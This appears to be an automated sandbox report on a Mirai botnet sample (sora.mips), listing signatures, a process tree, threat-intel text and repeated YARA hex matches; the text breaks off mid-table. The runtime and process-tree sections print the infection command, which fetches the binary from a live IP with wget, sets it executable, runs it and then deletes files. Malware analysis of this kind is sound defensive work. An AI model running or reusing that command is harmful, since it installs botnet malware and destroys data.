Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:	1431999
Infos:

Detection

Mirai

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Drops files in suspicious directories

Sample deletes itself

Sample tries to kill multiple processes (SIGKILL)

Creates hidden files and/or directories

ELF contains segments with high entropy indicating compressed/encrypted content

Enumerates processes within the "proc" file system

Executes the "chmod" command used to modify permissions

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Reads the 'hosts' file potentially containing internal network hosts

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431999
Start date and time:	2024-04-26 08:31:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxcmdlinecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal68.spre.troj.evad.lin@0/1@0/0

Warnings

Connection to analysis system has been lost, crash info: Unknown
Skipping network analysis since amount of network traffic is too extensive

Runtime Messages

Command:	/bin/sh -c "curl cd /tmp; wget http:/185.196.11.177/bins/sora.mips; chmod 777 ; ./sora.mips thinkphp; rm -rf "
PID:	6213
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Connected To CNC
Standard Error:	% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: cd curl: (3) URL using bad/illegal format or missing URL --2024-04-26 08:32:16-- http://185.196.11.177/bins/sora.mips Connecting to 185.196.11.177:80... connected. HTTP request sent, awaiting response... 200 OK Length: 28884 (28K) Saving to: sora.mips 0K .......... .......... ........ 100% 103K=0.3s 2024-04-26 08:32:17 (103 KB/s) - sora.mips saved [28884/28884]

Process Tree

system is lnxubuntu20

sh (PID: 6213, Parent: 6127, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "curl cd /tmp; wget http://185.196.11.177/bins/sora.mips; chmod 777 *; ./sora.mips thinkphp; rm -rf *"

sh New Fork (PID: 6214, Parent: 6213)

curl (PID: 6214, Parent: 6213, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl cd /tmp

sh New Fork (PID: 6216, Parent: 6213)

wget (PID: 6216, Parent: 6213, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://185.196.11.177/bins/sora.mips

sh New Fork (PID: 6217, Parent: 6213)

chmod (PID: 6217, Parent: 6213, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

sh New Fork (PID: 6218, Parent: 6213)

sora.mips (PID: 6218, Parent: 6213, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: ./sora.mips thinkphp

sora.mips New Fork (PID: 6220, Parent: 6218)

sora.mips New Fork (PID: 6221, Parent: 6218)

sora.mips New Fork (PID: 6224, Parent: 6218)

sora.mips New Fork (PID: 6226, Parent: 6224)

sora.mips New Fork (PID: 6418, Parent: 6226)

sora.mips New Fork (PID: 6419, Parent: 6226)

sora.mips New Fork (PID: 6227, Parent: 6224)

sora.mips New Fork (PID: 6229, Parent: 6224)

sora.mips New Fork (PID: 6412, Parent: 6224)

sora.mips New Fork (PID: 6414, Parent: 6412)

sh New Fork (PID: 6233, Parent: 6213)

rm (PID: 6233, Parent: 6213, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf 2to3-2.7 7z 7za 7zr GET HEAD NF POST Thunar VGAuthService X X11 Xephyr Xorg Xwayland [ aa-enabled aa-exec aconnect acpi_listen add-apt-repository addpart addr2line al al2 alsabat alsaloop alsamixer alsatplg alsaucm amidi amixer apg apgbfm aplay aplaymidi apport-bug apport-cli apport-collect apport-unpack appres appstreamcli aprofutil apropos apt apt-add-repository apt-cache apt-cdrom apt-config apt-extracttemplates apt-ftparchive apt-get apt-key apt-mark apt-sortpkgs aptdcon apturl apturl-gtk ar arch arecord arecordmidi arm2hpdl as aseqdump aseqnet asp-state4 aspell aspell-import at atobm atq atril atril-previewer atril-thumbnailer atrm automat-visualize3 avahi-browse avahi-browse-domains avahi-publish avahi-publish-address avahi-publish-service avahi-resolve avahi-resolve-address avahi-resolve-host-name avahi-set-host-name awk axfer b2sum base32 base64 basename bash bashbug batch bc bccmd bdftopcf

systemd New Fork (PID: 6340, Parent: 1)

systemd New Fork (PID: 6341, Parent: 1860)

systemd New Fork (PID: 6342, Parent: 1)

systemd New Fork (PID: 6343, Parent: 1)

systemd New Fork (PID: 6344, Parent: 1)

systemd New Fork (PID: 6345, Parent: 1)

systemd New Fork (PID: 6347, Parent: 1)

systemd New Fork (PID: 6348, Parent: 1)

gdm3 New Fork (PID: 6349, Parent: 1320)

gdm3 New Fork (PID: 6350, Parent: 1320)

systemd New Fork (PID: 6351, Parent: 1)

gdm3 New Fork (PID: 6352, Parent: 1320)

systemd New Fork (PID: 6353, Parent: 1860)

systemd New Fork (PID: 6354, Parent: 1)

systemd New Fork (PID: 6357, Parent: 1860)

systemd New Fork (PID: 6358, Parent: 1)

systemd New Fork (PID: 6359, Parent: 1860)

systemd New Fork (PID: 6360, Parent: 1860)

systemd New Fork (PID: 6361, Parent: 1)

systemd New Fork (PID: 6362, Parent: 1)

systemd New Fork (PID: 6363, Parent: 1)

systemd New Fork (PID: 6364, Parent: 1)

systemd New Fork (PID: 6365, Parent: 1)

systemd New Fork (PID: 6366, Parent: 1)

systemd New Fork (PID: 6367, Parent: 1)

systemd New Fork (PID: 6368, Parent: 1)

systemd New Fork (PID: 6371, Parent: 1)

systemd New Fork (PID: 6372, Parent: 1)

systemd New Fork (PID: 6373, Parent: 1)

gvfsd-fuse New Fork (PID: 6388, Parent: 2038)

systemd New Fork (PID: 6435, Parent: 1860)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
6229.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6229.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6229.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6221.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6221.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6221.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6418.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6418.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6418.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6412.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6412.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6412.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6414.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6414.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ea4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12eb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ecc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ee0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6414.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x132a8:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6227.1.00007f020c400000.00007f020c414000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6227.1.00007f020c400000.00007f020c414000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12d50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12da0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12db4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12dc8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ddc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12df0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e04:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e18:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e2c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e40:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e54:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 